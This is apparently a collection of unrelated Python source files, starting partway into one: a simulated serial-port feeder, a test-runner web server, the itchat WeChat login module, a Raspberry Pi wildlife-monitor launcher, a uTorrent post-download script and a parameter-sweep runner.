self.read_port cmd = ['/usr/bin/env', 'socat', verbose, #verbose, # repeating makes it more verbose read_port_params, write_port_params, ] try: # Run socat process using Popen, checking every second or so whether # it's died (poll() != None) or we've gotten a quit signal. logging.info('Calling: %s', ' '.join(cmd)) socat_process = subprocess.Popen(cmd) while not self.quit and not socat_process.poll(): try: socat_process.wait(1) except subprocess.TimeoutExpired: pass except Exception as e: logging.error('ERROR: socat command: %s', e) # If here, process has terminated, or we've seen self.quit. We # want both to be true: if we've terminated, set self.quit so that # 'run' loop can exit. If self.quit, terminate process. if self.quit: socat_process.kill() else: self.quit = True logging.info('Finished: %s', ' '.join(cmd)) ############################ def run(self, loop=False): """Create the virtual port with socat and start feeding it records from the designated logfile. If loop==True, loop when reaching end of input.""" self.socat_thread = threading.Thread(target=self._run_socat) self.socat_thread.start() time.sleep(0.2) self.reader = LogfileReader(filebase=self.source_file, use_timestamps=self.use_timestamps) self.strip = SliceTransform('1:') # strip off the first field) self.writer = TextFileWriter(self.write_port, truncate=True) while not self.quit: record = self.reader.read() # get the next record logging.debug('SimSerial got: %s', record) # End of input? If loop==True, re-open the logfile from the start if record is None: if not loop: break self.reader = LogfileReader(filebase=self.source_file, use_timestamps=self.use_timestamps) record = self.strip.transform(record) # strip the timestamp if record: logging.debug('SimSerial writing: %s', record) self.writer.write(record) # and write it to the virtual port # If we're here, we got None from our input, and are done. Signal # for run_socat to exit self.quit = True ################################################################################ if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('--config', dest='config', default=None, help='Config file of JSON specs for port-file mappings.') parser.add_argument('--logfile', dest='logfile', help='Log file to read from.') parser.add_argument('--loop', dest='loop', action='store_true', help='If True, loop when reaching end of sample data') parser.add_argument('--port', dest='port', help='Virtual serial port to open') parser.add_argument('--baud', dest='baud', type=int, help='Baud rate for port.') parser.add_argument('-v', '--verbosity', dest='verbosity', default=0, action='count', help='Increase output verbosity') args = parser.parse_args() LOGGING_FORMAT = '%(asctime)-15s %(message)s' logging.basicConfig(format=LOGGING_FORMAT) LOG_LEVELS ={0:logging.WARNING, 1:logging.INFO, 2:logging.DEBUG} args.verbosity = min(args.verbosity, max(LOG_LEVELS)) logging.getLogger().setLevel(LOG_LEVELS[args.verbosity]) # Okay - get to work here if args.config: configs = read_json(args.config) logging.info('Read configs: %s', configs) thread_list = [] for inst in configs: config = configs[inst] sim = SimSerial(port=config['port'], source_file=config['logfile']) sim_thread = threading.Thread(target=sim.run, kwargs={'loop': args.loop}) sim_thread.start() thread_list.append(sim_thread) logging.warning('Running simulated ports for %s', ', '.join(configs.keys())) for thread in thread_list: thread.join() # If no config file, just a simple, single serial port elif args.logfile and args.port: sim_serial = SimSerial(port=args.port, baudrate=args.baud, source_file=args.logfile) sim_serial.run(args.loop) # Otherwise, we don't have enough information to run else: parser.error('Either --config or both --logfile and --port must ' 'be specified')
webserver.py
import time import urllib.parse import threading import traceback import json import nose import sys import linecache import inspect import os.path import http.server import socketserver import queue as queue from mpi4py import MPI from nose.plugins.capture import Capture from nose.plugins.skip import Skip, SkipTest from nose.core import TestProgram from multiprocessing import Process, Queue from optparse import OptionParser from subprocess import call, Popen, PIPE from io import StringIO EDITOR = None osascript_to_open_xcode = """on run argv set linenumber to (item 1 of argv) as integer set filename_string to item 2 of argv set file_to_open to POSIX file filename_string tell application "Xcode" activate set doc_to_edit to (open file_to_open) tell doc_to_edit set its selection to item linenumber of paragraph of it end tell end tell end run""" def open_file(path, lineno = 1): global EDITOR if sys.platform == 'darwin': program = Popen( ['osascript', '-', str(lineno), os.path.join(os.getcwd(), path) ], stdin = PIPE, stdout = PIPE, stderr = PIPE) out, err = program.communicate(osascript_to_open_xcode) else: possible_programs = ( ['geany', path, '+'+str(lineno)], ['kate', '-u', '--line',str(lineno),path], ['emacs', '+'+str(lineno), path], ['nedit-client','-line', str(lineno), path], ) for program in possible_programs: if program[0] == EDITOR: returncode = call(['which', program[0]]) if returncode == 0: call(program) return for program in possible_programs: returncode = call(['which', program[0]]) if returncode == 0: call(program) return call([EDITOR, path]) class HandleRequest(http.server.BaseHTTPRequestHandler): def do_GET(self): self.parsed_path = urllib.parse.urlparse(self.path) path = self.parsed_path.path[1:] method_name = 'do_' + path if hasattr(self, method_name): method = getattr(self,method_name) string, content_type = method() else: if path.endswith(".js"): string, content_type = self.javascript_file(path) else: string, content_type = self.index_file() self.send_response(200) self.send_header("Content-type", content_type) self.send_header("Content-Length", str(len(string))) self.end_headers() self.wfile.write(string) def do_long_poll(self): self.send_response(200) self.send_header("Content-Type", "text/javascript") self.send_header("Transfer-Encoding", "chunked") self.send_header("Cache-Control", "no-cache, no-store") self.send_header("Pragma", "no-cache") self.end_headers() while True: self.server.tests_finished.wait(10.0) if self.server.tests_finished.is_set(): self.send_chunk('true') self.server.tests_finished.clear() else: self.send_chunk('false') self.wfile.write('0\r\n\r\n') self.wfile.flush() def send_chunk(self, string): hex_length = hex(len(string))[2:] self.wfile.write('%s \r\n' % hex_length) self.wfile.flush() self.wfile.write(string) self.wfile.write('\r\n') self.wfile.flush() def index_file(self): base = os.path.split(__file__)[0] filename = os.path.join(base, "realtime_test.html") with open(filename, "r") as file: contents = file.read() return contents, 'text/html' def javascript_file(self, path): base = os.path.split(__file__)[0] filename = os.path.join(base, path) if not os.path.exists(path): return '', 'text/javascript' with open(filename, "r") as file: contents = file.read() return contents, 'text/javascript' def log_message(self, format, *args): pass #sys.stderr.write("%s - - [%s] %s\n" % # (self.address_string(), # self.log_date_time_string(), # format%args)) def do_stop(self): thread = threading.Thread(target=self.server.stop) thread.daemon = True; thread.start() return 'null', 'text/javascript' def do_events(self): new_events = self.server.get_all_events_since_previous_query() string = json.dumps(new_events) content_type = 'text/javascript' return string, content_type def do_open_file(self): parameters = urllib.parse.parse_qs(self.parsed_path.query) path = parameters['path'][0] lineno = int(parameters['lineno'][0]) open_file(path, lineno) string = 'null' content_type = 'text/javascript' return string, content_type class WebServer(socketserver.ThreadingMixIn, http.server.HTTPServer): def __init__(self, port, request_handler): http.server.HTTPServer.__init__(self, ('', port), request_handler) self.daemon_threads = True self.events_queue = queue.Queue() def start(self): self.serve_forever() def stop(self): self.shutdown() def get_all_events_since_previous_query(self): try: events = [] while True: events.append(self.events_queue.get(False)) except queue.Empty: pass return events
login.py
import os, sys, time, re, io import threading import json, xml.dom.minidom import copy, pickle, random import traceback, logging try: from httplib import BadStatusLine except ImportError: from http.client import BadStatusLine import requests from pyqrcode import QRCode from .. import config, utils from ..returnvalues import ReturnValue from ..storage.templates import wrap_user_dict from .contact import update_local_chatrooms, update_local_friends from .messages import produce_msg logger = logging.getLogger('itchat') def load_login(core): core.login = login core.get_QRuuid = get_QRuuid core.get_QR = get_QR core.check_login = check_login core.web_init = web_init core.show_mobile_login = show_mobile_login core.start_receiving = start_receiving core.get_msg = get_msg core.logout = logout def login(self, enableCmdQR=False, picDir=None, qrCallback=None, loginCallback=None, exitCallback=None): if self.alive or self.isLogging: logger.warning('itchat has already logged in.') return self.isLogging = True while self.isLogging: uuid = push_login(self) if uuid: qrStorage = io.BytesIO() else: logger.info('Getting uuid of QR code.') while not self.get_QRuuid(): time.sleep(1) logger.info('Downloading QR code.') qrStorage = self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback) logger.info('Please scan the QR code to log in.') isLoggedIn = False while not isLoggedIn: status = self.check_login() if hasattr(qrCallback, '__call__'): qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue()) if status == '200': isLoggedIn = True elif status == '201': if isLoggedIn is not None: logger.info('Please press confirm on your phone.') isLoggedIn = None elif status != '408': break if isLoggedIn: break elif self.isLogging: logger.info('Log in time out, reloading QR code.') else: return # log in process is stopped by user logger.info('Loading the contact, this may take a little while.') self.web_init() self.show_mobile_login() self.get_contact(True) if hasattr(loginCallback, '__call__'): r = loginCallback() else: utils.clear_screen() if os.path.exists(picDir or config.DEFAULT_QR): os.remove(picDir or config.DEFAULT_QR) logger.info('Login successfully as %s' % self.storageClass.nickName) self.start_receiving(exitCallback) self.isLogging = False def push_login(core): cookiesDict = core.s.cookies.get_dict() if 'wxuin' in cookiesDict: url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % ( config.BASE_URL, cookiesDict['wxuin']) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(url, headers=headers).json() if 'uuid' in r and r.get('ret') in (0, '0'): core.uuid = r['uuid'] return r['uuid'] return False def get_QRuuid(self): url = '%s/jslogin' % config.BASE_URL params = { 'appid' : 'wx782c26e4c19acffb', 'fun' : 'new', } headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";' data = re.search(regx, r.text) if data and data.group(1) == '200': self.uuid = data.group(2) return self.uuid def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None): uuid = uuid or self.uuid picDir = picDir or config.DEFAULT_QR qrStorage = io.BytesIO() qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid) qrCode.png(qrStorage, scale=10) if hasattr(qrCallback, '__call__'): qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue()) else: if enableCmdQR: utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR) else: with open(picDir, 'wb') as f: f.write(qrStorage.getvalue()) utils.print_qr(picDir) return qrStorage def check_login(self, uuid=None): uuid = uuid or self.uuid url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL localTime = int(time.time()) params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % ( uuid, localTime / 1579, localTime) headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.code=(\d+)' data = re.search(regx, r.text) if data and data.group(1) == '200': if process_login_info(self, r.text): return '200' else: return '400' elif data: return data.group(1) else: return '400' def process_login_info(core, loginContent): ''' when finish login (scanning qrcode) * syncUrl and fileUploadingUrl will be fetched * deviceid and msgid will be generated * skey, wxsid, wxuin, pass_ticket will be fetched ''' regx = r'window.redirect_uri="(\S+)";' core.loginInfo['url'] = re.search(regx, loginContent).group(1) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False) core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')] for indexUrl, detailedUrl in ( ("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")), ("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")), ("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")), ("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")), ("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))): fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl] if indexUrl in core.loginInfo['url']: core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \ fileUrl, syncUrl break else: core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url'] core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17] core.loginInfo['BaseRequest'] = {} for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes: if node.nodeName == 'skey': core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data elif node.nodeName == 'wxsid': core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data elif node.nodeName == 'wxuin': core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data elif node.nodeName == 'pass_ticket': core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]): logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text) core.isLogging = False return False return True def web_init(self): url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time())) data = { 'BaseRequest': self.loginInfo['BaseRequest'], } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) dic = json.loads(r.content.decode('utf-8', 'replace')) # deal with login info utils.emoji_formatter(dic['User'], 'NickName') self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount']) self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User'])) self.memberList.append(self.loginInfo['User']) self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncKey']['List']]) self.storageClass.userName = dic['User']['UserName'] self.storageClass.nickName = dic['User']['NickName'] # deal with contact list returned when init contactList = dic.get('ContactList', []) chatroomList, otherList = [], [] for m in contactList: if m['Sex'] != 0: otherList.append(m) elif '@@' in m['UserName']: m['MemberList'] = [] # don't let dirty info pollute the list chatroomList.append(m) elif '@' in m['UserName']: # mp will be dealt in update_local_friends as well otherList.append(m) if chatroomList: update_local_chatrooms(self, chatroomList) if otherList: update_local_friends(self, otherList) return dic def show_mobile_login(self): url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'Code' : 3, 'FromUserName' : self.storageClass.userName, 'ToUserName' : self.storageClass.userName, 'ClientMsgId' : int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) return ReturnValue(rawResponse=r) def start_receiving(self, exitCallback=None, getReceivingFnOnly=False): self.alive = True def maintain_loop(): retryCount = 0 while self.alive: try: i = sync_check(self) if i is None: self.alive = False elif i == '0': pass else: msgList, contactList = self.get_msg() if msgList: msgList = produce_msg(self, msgList) for msg in msgList: self.msgList.put(msg) if contactList: chatroomList, otherList = [], [] for contact in contactList: if '@@' in contact['UserName']: chatroomList.append(contact) else: otherList.append(contact) chatroomMsg = update_local_chatrooms(self, chatroomList) chatroomMsg['User'] = self.loginInfo['User'] self.msgList.put(chatroomMsg) update_local_friends(self, otherList) retryCount = 0 except requests.exceptions.ReadTimeout: pass except: retryCount += 1 logger.error(traceback.format_exc()) if self.receivingRetryCount < retryCount: self.alive = False else: time.sleep(1) self.logout() if hasattr(exitCallback, '__call__'): exitCallback() else: logger.info('LOG OUT!') if getReceivingFnOnly: return maintain_loop else: maintainThread = threading.Thread(target=maintain_loop) maintainThread.setDaemon(True) maintainThread.start() def sync_check(self): url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url']) params = { 'r' : int(time.time() * 1000), 'skey' : self.loginInfo['skey'], 'sid' : self.loginInfo['wxsid'], 'uin' : self.loginInfo['wxuin'], 'deviceid' : self.loginInfo['deviceid'], 'synckey' : self.loginInfo['synckey'], '_' : int(time.time() * 1000),} headers = { 'User-Agent' : config.USER_AGENT } try: r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT) except requests.exceptions.ConnectionError as e: try: if not isinstance(e.args[0].args[1], BadStatusLine): raise # will return a package with status '0 -' # and value like: # 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93 # seems like status of typing, but before I make further achievement code will remain like this return '2' except: raise r.raise_for_status() regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}' pm = re.search(regx, r.text) if pm is None or pm.group(1) != '0': logger.debug('Unexpected sync check result: %s' % r.text) return None return pm.group(2) def get_msg(self): url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['wxsid'], self.loginInfo['skey'],self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'SyncKey' : self.loginInfo['SyncKey'], 'rr' : ~int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT } r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT) dic = json.loads(r.content.decode('utf-8', 'replace')) if dic['BaseResponse']['Ret'] != 0: return None, None self.loginInfo['SyncKey'] = dic['SyncCheckKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncCheckKey']['List']]) return dic['AddMsgList'], dic['ModContactList'] def logout(self): if self.alive: url = '%s/webwxlogout' % self.loginInfo['url'] params = { 'redirect' : 1, 'type' : 1, 'skey' : self.loginInfo['skey'], } headers = { 'User-Agent' : config.USER_AGENT } self.s.get(url, params=params, headers=headers) self.alive = False self.isLogging = False self.s.cookies.clear() del self.chatroomList[:] del self.memberList[:] del self.mpList[:] return ReturnValue({'BaseResponse': { 'ErrMsg': 'logout successfully.', 'Ret': 0, }})
launch.py
#!/usr/bin/env python3 #import sys #sys.path.append("./lib") import os import crontab from signal import pause from time import sleep from threading import Thread, ThreadError from lib.log import logger from lib.audiomoth import audiomoth from lib.camera import camera from lib.diskio import diskio from lib.config import cfg from lib.event import event, latest_event, event_queue from lib.power import PiJuicePower as Power from datetime import datetime, timedelta c = camera() am = audiomoth() d = diskio() p = Power() pij = p.pij def app_path(): return os.path.dirname(os.path.abspath(__file__)) def job_path(): return app_path() + '/jobs' def install_cron_job(tab:crontab.CronTab, command:str, comment:str): jobs_by_comment = tab.find_comment(comment) for job in jobs_by_comment: if job.comment == comment: return job return tab.new(command=command, comment=comment) def install_cron_jobs(): tab = crontab.CronTab(user=True) install_cron_job(tab,f'{job_path()}/job_launch.sh','job0').minute.every(10) install_cron_job(tab,f'{job_path()}/job_git_pull.sh','job1').minute.every(10) install_cron_job(tab,f'{job_path()}/job_cleanup.sh','job2').hour.every(2) install_cron_job(tab,f'{job_path()}/job_check_power.py','job3').hour.every(30) install_cron_job(tab,f'{job_path()}/job_network_switch.sh','job4').minute.every(1) install_cron_job(tab,f'{job_path()}/job_reverse_ssh.sh','job5').hour.every(1) install_cron_job(tab,f'{job_path()}/job_send_heartbeat.py','job6').minute.every(1) install_cron_job(tab,f'{job_path()}/job_sync_aws.sh','job7').minute.every(15) tab.write() def on_motion(): # Creating a new event automatically logs it e = event() logger.info("on_motion") c.click(cfg.camera.photo_count, cfg.camera.photo_delay_sec, f'Event:{e.id}') init_sleep = e.get_seconds_until_stop() sleep(init_sleep if init_sleep > 0 else 1) return e def on_no_motion(e:event): logger.info("on_no_motion") print("Recording stopping") x = Thread(target=am.mountMoth, args=()) x.start() x.join() print("Transferring audio") d.transfer_audio(cfg.paths.audiomoth, cfg.paths.recordings, e) print("Transferred audio") y = Thread(target=am.unmountMoth, args=()) y.start() y.join() print("Recording started") def movement(e:event): m = int(pij.status.GetIoDigitalInput(2)['data']) print(m, end='', flush=True) return m def check_restart(): if cfg.is_restart_required(): print('Restarting') d.sendmail(f"{cfg.name} Server Restarting", f"{cfg.name} Server Restarting", cfg.emailto) logger.info('Restarting') am.unmountMoth() cfg.restart_clear() exit() def check_reboot(): if cfg.is_reboot_required(): print('Rebooting') logger.info('Rebooting') d.sendmail(f"{cfg.name} Server Restarting", f"{cfg.name} Server Rebooting", cfg.emailto) am.unmountMoth() cfg.reboot_clear() cfg.stop_clear() os.system('sudo shutdown -r 1') def check_power(): if p.should_sleep(): status = p.status() print('Pi powerdown due to Power state') logger.info(f'Pi powerdown due to Power state: {status}') d.sendmail(f'{cfg.name} Server Powerdown', f'{cfg.name} Server Powerdown \n{status}', cfg.emailto) def send_status_email(): global send_status_email_at now = datetime.utcnow() if send_status_email_at is None: send_status_email_at = now if send_status_email_at <= now: send_status_email_at = now + timedelta(minutes = 5) power = p.status() wifi_details = d.wifi_details() wifi_networks = d.wifi_networks() d.sendmail(cfg.name, f"{cfg.name} Server Starting\nWiFi\n{wifi_details}\nNetworks\n{wifi_networks}\npower\n{power}", cfg.emailto) attempt=1 max_attempt=3 success=False send_status_email_at = datetime.utcnow() pi_disk_check = d.check_disk(report = True, display = True, path = cfg.paths.root ) moth_disk_check = {} send_status_email() while attempt <= max_attempt and not success: try: am.resetMoth() am.mountMoth() # Clean up the AudioMoth to begin d.remove_files(am.mount_path, pattern = "*.WAV", sudo = True) moth_disk_check = d.check_disk(report = True, display = True, path = am.mount_path) # Configure the AudioMoth for the next recording session am.usbModeOn() am.setTime() # Unmount to allow recording to commence am.unmountMoth() success = True except: print(f'Startup attempt {attempt} of {max_attempt} failed') attempt = attempt + 1 if not success: logger.warning('AudioMoth startup failed') print('Please check AudioMoth') d.sendmail(cfg.name, f"{cfg.name} Error: AudioMoth Failure", cfg.emailto) sleep(5) exit() # Main Loop while True: if movement(None) > 0: e = on_motion() d.sendmail(cfg.name, f"{cfg.name} Motion Event (id:{e.id})", cfg.emailto) # Detect when motion stops while not e.has_ended(): e.enqueue(movement(e)) on_no_motion(e) check_power() check_reboot() check_restart() while cfg.is_stop_required(): cfg.stop() print('Paused', flush=True) d.sendmail(f"{cfg.name} Server Stop", f"{cfg.name} Server Stop", cfg.emailto) logger.info('Paused') while cfg.is_stop_required(): sleep(1) check_power() check_reboot() check_restart() cfg.stop_clear() logger.info('Resumed') d.sendmail(f"{cfg.name} Server Resume", f"{cfg.name} Server Resume", cfg.emailto) print('Resumed', flush=True)
torrent_script.py
''' @author: Joseph Milazzo @description: A script which is run after a uTorrent torrent has completed downloading. This script will copy the torrent data to the appropriate directory on a remote machine. Directory is determined by torrent's label. This script is configurable through config.ini file. This takes arguments from command line. Script Arguements: --name Name of downloaded file (for single file torrents) --dir Directory where files are saved --title Title of torrent --state State of torrent* --label Label --tracker Tracker --status_msg Status message string (same as status column) --info_hash hex encoded info-hash --prev_state Previous state of torrent --kind kind of torrent (single|multi) --log_dir Directory to store log data in *State is a combination of: started = 1 checking = 2 start-after-check = 4 checked = 8 error = 16 paused = 32 auto = 64 loaded = 128 For example, if a torrent job has a status of 201 = 128 + 64 + 8 + 1, then it is loaded, queued, checked, and started. A bitwise AND operator should be used to determine whether the given STATUS contains a particular status. Example Input: Directory="K:\Applications\Advanced SystemCare Pro 7.3.0.454 [ChingLiu]" Torrent Name="Advanced SystemCare Pro 7.3.0.454 [ChingLiu]" Label="Test" Kind="multi" Filename="Activation pictures\Snap1.jpg" Hash="E2BCFD4306B905E3B785F5DB8BA54ACCAE46FFB6" ''' ''' The way the ending script will work is it will start and read needed info from config file. The application will then load all scripts from userscripts (nested folders) and create a queue from them (scripts can define priority to ensure they are scheduled before another). Each script will execute in priority order on a separate thread or coroutine. Once all scripts execute (or expire if not completed after threadshold (user defined) is met, the program logs and terminates.) This script is defined for uTorrent, but it should be usable by other torrenting programs. Ensure you use proper encapsulation and inheritance for this. :) ''' import argparse import commands import ConfigParser from collections import namedtuple from flask import Flask # Used for web API import flask import logging import json import uTorrent import os import signal import subprocess import sys import threading import time Torrent = namedtuple('Torrent', ['directory', 'kind', 'label', 'name', 'title', 'state', 'prev_sate', 'tracker', 'status_msg', 'info_hash']) class ScriptThread(threading.Thread): try: def __init__(self, script_file): threading.Thread.__init__(self) self.script_file = script_file def run(self): print 'Thread runnning for ' + os.path.abspath(self.script_file) subprocess.call('python ' + self.script_file, stderr=subprocess.STDOUT, shell=True) except Exception, e: raise e # TODO: Fix this def sig_handler(): logger.log('Signal Handler called') app.stop() flask.request.environ.get('werkzeug.server.shutdown')() app_thread.join() [t.join() for t in threads] def config_section_map(section): dict1 = {} options = config.options(section); for option in options: try: dict1[option] = config.get(section, option); if dict1[option] == -1: print("skip: %s" % option); except: print("exception on %s!" % option); dict1[option] = None; return dict1; def get_argument(argument, default="None"): if argument: return argument[0] else: return default def start_app(): app.run() def init(): global config # Create Configuration Parser and setup Logger config = ConfigParser.ConfigParser() config.read("config.ini") log_file = config_section_map("Logging")['log_file'] lpath = config_section_map("Logging")['log_directory'] if lpath is None: lpath = '.' log_directory = os.path.abspath(lpath) if not os.path.exists(log_directory): os.mkdir(log_directory) log_filePath = os.path.join(log_directory, log_file) if not os.path.isfile(log_filePath): with open(log_filePath, "w") as emptylog_file: emptylog_file.write(''); logging.basicConfig(filename=log_filePath,level=logging.DEBUG) logger = logging.getLogger(__name__); logger.info("######### Script Executed at " + time.asctime(time.localtime(time.time()))) # CLI parser = argparse.ArgumentParser() parser.add_argument('--state', required=False, nargs=1, help="State of torrent") parser.add_argument('--prev_state', required=False, nargs=1, help="Previous state of torrent") parser.add_argument('--tracker', required=False, nargs=1, help="Torrent's tracker") parser.add_argument('--status_msg', required=False, nargs=1, help="Status message string (same as status column)") parser.add_argument('--dir', required=False, nargs=1, help="Directory where files are saved") parser.add_argument('--name', required=False, nargs=1, help="Name of downloaded file (for single file torrents)") parser.add_argument('--title', required=False, nargs=1, help="Title of torrent") parser.add_argument('--label', required=False, nargs=1, help="Torrent's label") parser.add_argument('--kind', required=False, nargs=1, help="Kind of torrent (single | multi)") parser.add_argument('--info_hash', required=False, nargs=1, help="Hex encoded info-hash") args = parser.parse_args() torrent = None try: logger.info("Parsing Arguments") # Required Arguments torrent_dir = str(get_argument(args.dir)) torrent_kind = str(get_argument(args.kind)) torrent_label = str(get_argument(args.label)) torrent_name = str(get_argument(args.name)) torrent_title = str(get_argument(args.title)) # Optional Arguments torrent_state = int(get_argument(args.state, -1)) torrent_prev_state = int(get_argument(args.prev_state, -1)) torrent_tracker = str(get_argument(args.tracker)) torrent_status_msg = str(get_argument(args.status_msg)) torrent_info_hash = str(get_argument(args.info_hash)) torrent = Torrent(torrent_dir, torrent_kind, torrent_label, torrent_name, torrent_title, torrent_state, torrent_prev_state, torrent_tracker, torrent_status_msg, torrent_info_hash) except Exception, e: logger.info(str(e)) logger.info("Finished Parsing Arguments") return torrent app = Flask(__name__) @app.route('/getTorrent', methods=['GET', 'POST']) def get_torrent(): ''' Returns the torrent that has triggered this script ''' return json.dumps(torrent.__dict__) @app.route('/shutdown', methods=['POST']) def shutdown(): ''' Kills the server. ''' flask.request.environ.get('werkzeug.server.shutdown')() return 'Server Shutdown' @app.route('/done', methods=['POST']) def userscript_finished(): ''' Userscript is finished executing. Increment script counter. ''' global finished_userscripts finished_userscripts += 1 if finished_userscripts >= len(scripts): flask.request.environ.get('werkzeug.server.shutdown')() return str(finished_userscripts) @app.route('/stopTorrent', methods=['POST']) def stop_torrent(arguments): global torrent_client print arguments torrent_client.stop_torrent(arguments.hash) return '{}' scripts = [] threads = [] finished_userscripts = 0 if __name__ == '__main__': # Register signals, such as CTRL + C signal.signal(signal.SIGINT, sig_handler) signal.signal(signal.SIGTERM, sig_handler) global torrent global torrent_client torrent = init() if torrent is None: logger.warn('Torrent is not set!') # Setup WebAPI-enabled Torrent Client url = 'http://' + config_section_map("Web API")['address'] + ':' + config_section_map("Web API")['port'] + '/gui/' torrent_client = uTorrent.uTorrent(url, config_section_map("Web API")['username'], config_section_map("Web API")['password']) global app_thread app_thread = threading.Thread(target=start_app).start() # Find userscripts userscript_dir = os.path.abspath('userscripts') exclude = [] for root, dirs, files in os.walk(userscript_dir, topdown=True): dirs[:] = [d for d in dirs if d not in exclude] for file in files: if file.endswith('.py'): # Add file to pqueue scripts.append(os.path.join(root, file)) # Let's execute some coroutines for script in scripts: t = ScriptThread(script).start() threads.append(t)
run_parameter_sweep.py
''' Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. ''' import time import itertools import subprocess from multiprocessing import Process, Queue def do_work(work): while not work.empty(): experiment = work.get() print(experiment) subprocess.call(experiment.split(" ")) return True NUM_PROCESSES = 5 work = Queue() ################################################ # Run the algorithm with the dataset footprints ################################################ datasets = ["poultry_barns", "solar_farms_reduced"] cluster_options = { "poultry_barns": [16, 32, 64], "solar_farms_reduced": [16, 32, 64], } buffer_options = { "poultry_barns": [400,200,100], "solar_farms_reduced": [0.024,0.016], } for dataset in datasets: for num_clusters, buffer, in itertools.product(cluster_options[dataset], buffer_options[dataset]): command = f"python run_algorithm.py --dataset {dataset} --num_clusters {num_clusters} --buffer {buffer} --output_dir results/kl/{dataset}-{num_clusters}-{buffer}/ --algorithm kl" work.put(command) ################################################ # Run the algorithm with the random polygons ################################################ datasets = ["poultry_barns_random", "solar_farms_reduced_random"] cluster_options = { "poultry_barns_random": [16, 32, 64], "solar_farms_reduced_random": [16, 32, 64], } buffer_options = { "poultry_barns_random": [400,200,100], "solar_farms_reduced_random": [0.024,0.016], } for dataset in datasets: for num_clusters, buffer, in itertools.product(cluster_options[dataset], buffer_options[dataset]): command = f"python run_algorithm.py --dataset {dataset} --num_clusters {num_clusters} --buffer {buffer} --output_dir results/kl/{dataset}-{num_clusters}-{buffer}/ --algorithm kl" work.put(command) ## Start experiments processes = [] start_time = time.time() for i in range(NUM_PROCESSES): p = Process(target=do_work, args=(work,)) processes.append(p) p.start() for p in processes: p.join()
webserver.py
